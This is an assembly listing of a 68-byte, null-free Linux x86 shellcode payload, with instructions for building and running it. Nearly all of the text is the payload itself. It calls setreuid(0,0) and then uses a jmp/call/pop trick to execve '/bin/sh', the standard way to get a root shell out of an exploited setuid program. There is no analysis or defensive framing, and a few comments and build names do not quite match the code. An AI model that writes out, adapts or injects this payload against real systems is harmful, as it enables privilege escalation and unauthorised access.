compile with: nasm -f elf shellcode.asm, then ld shell.o and ./a.out ;-)


--------------------------------------------------------BEGIN---------------------------------------------------

; 68 bytes shellcode
; no use of null byte, it uses pop and push to get '/bin/sh' string from 
data segment.
; Compile with: nasm -f elf shellcode.asm, then ld shell.o and ./a.out ;-)

section .data

db '/bin/sh'
global _start

_start:

; setruid(uid_t ruid, uid_t euid)

xor eax, eax
mov al, 70
xor ebx, ebx
xor ecx, ecx
int 0x80

jmp two
one:
pop ebx

; execve(const char *filename, char *const argv[], char *const envp[])

xor eax, eax
mov [ebx+7], al
mov [ebx+8], ebx
mov [ebx+12], eax
mov al, 11
lea ecx, [ebx+8]
lea edx, [ebx+12]
int 0x80

two:
call one
db '/bin/sh'
--------------------------------------------------------END-----------------------------------------------------